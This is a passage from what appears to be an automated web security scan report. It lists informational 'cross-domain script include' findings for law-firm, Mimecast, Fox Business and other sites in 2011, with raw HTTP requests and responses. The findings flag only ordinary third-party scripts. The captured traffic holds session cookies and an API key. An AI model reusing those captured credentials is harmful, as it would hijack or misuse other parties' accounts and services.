Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.csscorp.com/contact-us/general-enquiry.php
Cookie: csscorp=173.193.214.243.1305201370918613; __utma=202015363.216220317.1305202210.1305202210.1305202210.1; __utmc=202015363; __utmz=202015363.1305202210.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LOOPFUSE=9508c8ea-cfac-4a9a-8137-aeaa3d55f0e1; wp1090=UTCTDDDDDDTVYCAU

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:58:22 GMT
Server: Apache/2.2.12 (Unix)
X-Powered-By: PHP/5.2.8
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25994

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>CSS Corp - We are so
...[SNIP]...
</script>-->
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=csscorp"></script>
...[SNIP]...
</script>
           
           <script src="http://lfov.net/webrecorder/js/listen.js" type="text/Javascript"></script>
...[SNIP]...

20.25. http://www.elawmarketing.com/about

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elawmarketing.com
Path:   /about

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about HTTP/1.1
Host: www.elawmarketing.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.elawmarketing.com/contact-us
Cookie: SESS12e590b5abdc44fd41146e46388173a1=eb9d5d4ea1e9477d833990655e7604b8; has_js=1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:04:49 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Thu, 12 May 2011 12:04:50 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 11088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equi
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...

20.26. http://www.elawmarketing.com/about/clients

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elawmarketing.com
Path:   /about/clients

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about/clients HTTP/1.1
Host: www.elawmarketing.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.elawmarketing.com/
Cookie: SESS12e590b5abdc44fd41146e46388173a1=eb9d5d4ea1e9477d833990655e7604b8; has_js=1
If-Modified-Since: Thu, 12 May 2011 12:00:43 GMT

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:00:51 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Thu, 12 May 2011 12:00:52 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13504

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equi
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...

20.27. http://www.elawmarketing.com/about/staff

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elawmarketing.com
Path:   /about/staff

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about/staff HTTP/1.1
Host: www.elawmarketing.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.elawmarketing.com/about/clients
Cookie: SESS12e590b5abdc44fd41146e46388173a1=eb9d5d4ea1e9477d833990655e7604b8; has_js=1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:08:01 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Thu, 12 May 2011 12:08:06 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 15456

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equi
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...

20.28. http://www.elawmarketing.com/contact-us

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elawmarketing.com
Path:   /contact-us

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /contact-us HTTP/1.1
Host: www.elawmarketing.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.elawmarketing.com/
Cookie: SESS12e590b5abdc44fd41146e46388173a1=eb9d5d4ea1e9477d833990655e7604b8; has_js=1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:03:57 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Thu, 12 May 2011 12:04:07 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 26710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equi
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...

20.29. http://www.elawmarketing.com/resources/reports/top-10-seo-best-practices-law-firm-websites-0

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elawmarketing.com
Path:   /resources/reports/top-10-seo-best-practices-law-firm-websites-0

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /resources/reports/top-10-seo-best-practices-law-firm-websites-0 HTTP/1.1
Host: www.elawmarketing.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.elawmarketing.com/
Cookie: SESS12e590b5abdc44fd41146e46388173a1=eb9d5d4ea1e9477d833990655e7604b8; has_js=1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:01:12 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Thu, 12 May 2011 12:01:14 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 11950

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equi
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...

20.30. http://www.elawmarketing.com/services/websites

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elawmarketing.com
Path:   /services/websites

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /services/websites HTTP/1.1
Host: www.elawmarketing.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.elawmarketing.com/
Cookie: SESS12e590b5abdc44fd41146e46388173a1=eb9d5d4ea1e9477d833990655e7604b8; has_js=1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:04:01 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Thu, 12 May 2011 12:04:10 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 16016

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equi
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...

20.31. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/like.php?&width=400&height=80&layout=standard&show_faces=true&action=like&font=arial&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110512_0700%26ssh%3DS423239929%26FORM%3DHPFBLK%26mkt%3Den-US%26 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.145.48
X-Cnection: close
Date: Thu, 12 May 2011 10:59:38 GMT
Content-Length: 8669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/HD3OAbjOVTn.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js"></script>
...[SNIP]...

20.32. http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxbusiness.com
Path:   /markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/ HTTP/1.1
Host: www.foxbusiness.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/forstmann-is-said-to-be-undergoing-treatment-for-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-FoxNews-EdgeTTL: 5m
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=240
Date: Thu, 12 May 2011 11:37:53 GMT
Connection: close
Content-Length: 66439

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotoc
...[SNIP]...
</script>
       

                       <script src="http://ads.foxnews.com/js/ad.js"></script>
...[SNIP]...

20.33. http://www.gobignetwork.com/funding

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gobignetwork.com
Path:   /funding

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /funding HTTP/1.1
Host: www.gobignetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
Set-Cookie: _referrer=||||http://www.gobignetwork.com/funding||||5/12/2011 7:01 AM; expires=Sun, 06-May-2012 11:01:18 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 11:01:18 GMT
Content-Length: 56329


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><title>
...[SNIP]...
</script>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

20.34. http://www.korteco.com/live-project

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.korteco.com
Path:   /live-project

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /live-project HTTP/1.1
Host: www.korteco.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.korteco.com/
Cookie: SESS31e5fbde7def436979bdb9291b5781da=0evqcgbv3nlct72jq5nho296j5; has_js=1; __utma=91397376.1526762305.1305205892.1305205892.1305205892.1; __utmb=91397376.1.10.1305205892; __utmc=91397376; __utmz=91397376.1305205892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:11:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Last-Modified: Thu, 12 May 2011 13:11:51 GMT
ETag: "1cae53c427fe4cd2eed31261561f8ac8"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script src="http://maps.google.com/maps?file=api&amp;v=2.115&amp;key=ABQIAAAAN3OhYUYVAE5sUttuXebjOBQRyETACf-kbMYmEl0n_VqOZ4dc_xRFVoMOBnh8vPZ34ZxZKVgwCP0JEA&amp;hl=en" type="text/javascript"></script>
...[SNIP]...

20.35. http://www.mimecast.com/About-us/Contact-us/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mimecast.com
Path:   /About-us/Contact-us/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /About-us/Contact-us/ HTTP/1.1
Host: www.mimecast.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ASP.NET_SessionId=lceka2nmzsc44jouj2at51w5; MimecastcomTracker=id=1762891

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Wed, 11 May 2011 12:37:48 GMT
Vary: Accept-Encoding
Set-Cookie: MimecastcomRegion=North America; expires=Fri, 11-May-2012 12:37:48 GMT; path=/
Date: Thu, 12 May 2011 12:37:48 GMT
Content-Length: 106303

...

<!DOCTYPE HTML>
<html>
<head id="ctl00_ctl00_Head1"><meta charset="utf-8" /><title>Contact Mimecast | Product Inquiry | Demo Request</title>
<META NAME="DESCRIPTION" CONTENT="If you have an i
...[SNIP]...
<!-- end rounded corners -->

   
           <script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js" type="text/javascript"></script>
...[SNIP]...

20.36. http://www.mimecast.com/News-and-views/Press-releases/Dates/2011/5/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mimecast.com
Path:   /News-and-views/Press-releases/Dates/2011/5/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /News-and-views/Press-releases/Dates/2011/5/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director/ HTTP/1.1
Host: www.mimecast.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mimecast.com/News-and-views/Press-releases/
Cookie: ASP.NET_SessionId=jog5wjepoenulrevfy0j33fx; MimecastcomTracker=id=1762893; MimecastcomRegion=North America; __utma=147046443.160771080.1305203710.1305203710.1305203710.1; __utmb=147046443.4.10.1305203710; __utmc=147046443; __utmz=147046443.1305203710.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Wed, 11 May 2011 12:39:26 GMT
Vary: Accept-Encoding
Date: Thu, 12 May 2011 12:39:26 GMT
Content-Length: 29960

...

<!DOCTYPE HTML>
<html>
<head id="ctl00_ctl00_Head1"><meta charset="utf-8" /><title>Mimecast</title>


<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
       <meta name="viewpor
...[SNIP]...
</script>
<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...

20.37. http://www.pomerantzlaw.com/attorneys.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pomerantzlaw.com
Path:   /attorneys.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /attorneys.html HTTP/1.1
Host: www.pomerantzlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pomerantzlaw.com/contact-us.html
Cookie: CFID=b0dfc93c%2D1d63%2D4672%2D97a7%2D5d72752495c2; CFTOKEN=0; __utma=182215078.918065188.1305200941.1305200941.1305200941.1; __utmb=182215078.2.10.1305200941; __utmc=182215078; __utmz=182215078.1305200941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:49:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Type: text/html; charset=UTF-8
Content-Length: 12120


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/ja
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...

20.38. http://www.pomerantzlaw.com/cases.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pomerantzlaw.com
Path:   /cases.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /cases.html?action=caseDetail&CaseID=102 HTTP/1.1
Host: www.pomerantzlaw.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:40:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Set-Cookie: CFID=ee3f1093%2D41a1%2D4002%2D9045%2D87d36bf03195; domain=www.pomerantzlaw.com; path=/; expires=Fri, 10-May-2041 19:32:14 GMT
Set-Cookie: CFTOKEN=0; domain=www.pomerantzlaw.com; path=/; expires=Fri, 10-May-2041 19:32:14 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9411


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/ja
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...

20.39. http://www.pomerantzlaw.com/contact-us.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pomerantzlaw.com
Path:   /contact-us.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /contact-us.html HTTP/1.1
Host: www.pomerantzlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pomerantzlaw.com/cases.html?action=caseDetail&CaseID=102
Cookie: CFID=b0dfc93c%2D1d63%2D4672%2D97a7%2D5d72752495c2; CFTOKEN=0; __utma=182215078.918065188.1305200941.1305200941.1305200941.1; __utmb=182215078.1.10.1305200941; __utmc=182215078; __utmz=182215078.1305200941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:49:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Type: text/html; charset=UTF-8
Content-Length: 10359


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/ja
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...

20.40. http://www.pomerantzlaw.com/practice-areas.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pomerantzlaw.com
Path:   /practice-areas.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /practice-areas.html HTTP/1.1
Host: www.pomerantzlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pomerantzlaw.com/attorneys.html?action=attorneyDetail&attorneyID=15
Cookie: CFID=b0dfc93c%2D1d63%2D4672%2D97a7%2D5d72752495c2; CFTOKEN=0; __utma=182215078.918065188.1305200941.1305200941.1305200941.1; __utmb=182215078.7.10.1305200941; __utmc=182215078; __utmz=182215078.1305200941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:00:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Type: text/html; charset=UTF-8
Content-Length: 8281


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/ja
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...

20.41. http://www.pomerantzlaw.com/the-firm.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pomerantzlaw.com
Path:   /the-firm.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /the-firm.html HTTP/1.1
Host: www.pomerantzlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
